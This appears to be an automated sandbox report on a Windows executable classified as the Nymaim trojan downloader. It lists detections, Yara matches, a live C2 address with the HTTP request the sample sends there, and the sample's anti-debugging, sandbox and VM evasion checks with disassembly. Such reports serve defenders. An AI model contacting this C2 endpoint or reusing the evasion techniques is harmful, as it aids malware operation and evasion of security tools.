
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565665
MD5: c54023b84d77e5ce72a48eda24bbc227
SHA1: 21c893f54354a48114c3d36e938f69f7d7f32430
SHA256: e2cee0f3aa497ae6990b9ff45110eaf89a95b31e34383ef8c655bf1a12544d43
Tags: exe, user-Bitsight

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 5796 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C54023B84D77E5CE72A48EDA24BBC227)
Name: Nymaim
Description: Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim
{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Yara matches (memory dumps):
Source: 00000000.00000002.4101686121.00000000047A0000.00000040.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_RedLineStealer_ed346e4c | Description: unknown | Author: unknown | Strings: 0x8436:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Source: 00000000.00000003.1656980225.0000000004A40000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Nymaim | Description: Yara detected Nymaim | Author: Joe Security
Source: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Nymaim | Description: Yara detected Nymaim | Author: Joe Security
Source: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Nymaim | Description: Yara detected Nymaim | Author: Joe Security
Source: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_Smokeloader_3687686f | Description: unknown | Author: unknown | Strings: 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

Yara matches (unpacked PE files):
Source: 0.3.file.exe.4a40000.0.raw.unpack | Rule: JoeSecurity_Nymaim | Description: Yara detected Nymaim | Author: Joe Security
Source: 0.2.file.exe.4950e67.1.raw.unpack | Rule: JoeSecurity_Nymaim | Description: Yara detected Nymaim | Author: Joe Security
Source: 0.2.file.exe.400000.0.unpack | Rule: JoeSecurity_Nymaim | Description: Yara detected Nymaim | Author: Joe Security
Source: 0.2.file.exe.400000.0.raw.unpack | Rule: JoeSecurity_Nymaim | Description: Yara detected Nymaim | Author: Joe Security

No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubPj | Avira URL Cloud: Label: malware
Source: 0.3.file.exe.4a40000.0.raw.unpack | Malware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Source: file.exe | ReversingLabs: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04953837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

Networking

Source: Malware configuration extractor | IPs: 185.156.72.65
Source: Joe Sandbox View | IP Address: 185.156.72.65
Source: Joe Sandbox View | ASN Name: ITDELUXE-ASRU
Source: unknown | TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance
Source: global traffic | HTTP traffic detected:
    GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: 1
    Host: 185.156.72.65
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: file.exe, 00000000.00000002.4100666631.0000000000C62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4100666631.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4100666631.0000000000C67000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
Source: file.exe, 00000000.00000002.4100666631.0000000000C67000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubPj

E-Banking Fraud

Source: Yara match | File source: 0.3.file.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4950e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1656980225.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 00000000.00000002.4101686121.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\file.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0495AA07 appears 34 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0040A7A0 appears 35 times
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.4101686121.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: file.exe | Static PE information: Section: (empty) ZLIB complexity 0.9953100119426752
Source: file.exe | Static PE information: Section: cippurft ZLIB complexity 0.9926368211269656
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_047A8464 CreateToolhelp32Snapshot,Module32First
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance
Source: C:\Users\user\Desktop\file.exe | Command line argument: nosub (0_2_004087E0)
Source: C:\Users\user\Desktop\file.exe | Command line argument: mixtwo (0_2_004087E0)
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 31%
Source: file.exe | String found in binary or memory: /add?substr=
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 2029568 > 1048576
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe | Static PE information: Raw size of cippurft is bigger than: 0x100000 < 0x1ad400

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cippurft:EW;vcdmathy:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1fe036 should be: 0x1fd309
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: cippurft
Source: file.exe | Static PE information: section name: vcdmathy
Source: file.exe | Static PE information: section name: .taggant
                Source: file.exeStatic PE information: section name: entropy: 7.9437280014334295
                Source: file.exeStatic PE information: section name: cippurft entropy: 7.950859026244158

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F9062 second address: 5F9068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F9068 second address: 5F906C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F906C second address: 5F908E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F79113F0796h 0x00000008 jmp 00007F79113F07A8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F908E second address: 5F9094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F9094 second address: 5F909A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EB4C4 second address: 5EB4D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007F79111F4F02h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5EB4D1 second address: 5EB4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F7FCF second address: 5F7FFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F79111F4F03h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 jp 00007F79111F4EFEh 0x0000001a jo 00007F79111F4EF6h 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F7FFF second address: 5F8005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F8005 second address: 5F8009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F8415 second address: 5F8424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F79113F0796h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F86E7 second address: 5F8701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F79111F4EF6h 0x0000000a jbe 00007F79111F4EFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F8701 second address: 5F8707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F884F second address: 5F8892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F79111F4F05h 0x0000000c push edi 0x0000000d jmp 00007F79111F4EFAh 0x00000012 pop edi 0x00000013 jnc 00007F79111F4F02h 0x00000019 pushad 0x0000001a jnc 00007F79111F4EF6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FC713 second address: 5FC779 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F79113F0796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jno 00007F79113F0796h 0x00000011 pop ebx 0x00000012 popad 0x00000013 xor dword ptr [esp], 12D67B41h 0x0000001a mov dword ptr [ebp+122D18BAh], edx 0x00000020 mov dh, 7Ah 0x00000022 push 00000003h 0x00000024 or dh, 00000037h 0x00000027 push 00000000h 0x00000029 movsx esi, di 0x0000002c push 00000003h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F79113F0798h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 add edx, 520A8979h 0x0000004e push A77AE824h 0x00000053 jo 00007F79113F07A4h 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FC779 second address: 5FC77F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FC77F second address: 5FC79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 188517DCh 0x0000000c push ebx 0x0000000d stc 0x0000000e pop esi 0x0000000f lea ebx, dword ptr [ebp+1245C4ADh] 0x00000015 sbb ch, 00000025h 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FC79D second address: 5FC7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FC91B second address: 5FC921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61C00F second address: 61C014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61C014 second address: 61C027 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F79113F0798h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b jo 00007F79113F0796h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61A1F4 second address: 61A1FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61A1FA second address: 61A200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61A7C5 second address: 61A7E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F79111F4F04h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61A7E3 second address: 61A7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61A7E9 second address: 61A813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4F01h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F79111F4F00h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61A92F second address: 61A954 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F79113F07ACh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61A954 second address: 61A95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61AC05 second address: 61AC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61AD3B second address: 61AD67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F79111F4EFDh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F79111F4F02h 0x00000011 jc 00007F79111F4EF6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61AD67 second address: 61AD94 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jno 00007F79113F0796h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F79113F07A0h 0x00000017 popad 0x00000018 jmp 00007F79113F079Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61AD94 second address: 61AD9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61AD9A second address: 61AD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61AF00 second address: 61AF0A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61AF0A second address: 61AF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 612F49 second address: 612F68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F79111F4F08h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 620B7E second address: 620B83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 621E40 second address: 621E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 621E44 second address: 621E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 621E4A second address: 621E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F79111F4EFEh 0x0000000d jng 00007F79111F4EF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 623465 second address: 62346B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62346B second address: 623474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 629AA4 second address: 629AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 629AA8 second address: 629AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 628EDD second address: 628EF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F79113F079Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62B8E3 second address: 62B908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F79111F4EFDh 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F79111F4EFCh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62BA67 second address: 62BA6D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62BCBA second address: 62BCBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62BCBE second address: 62BCC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
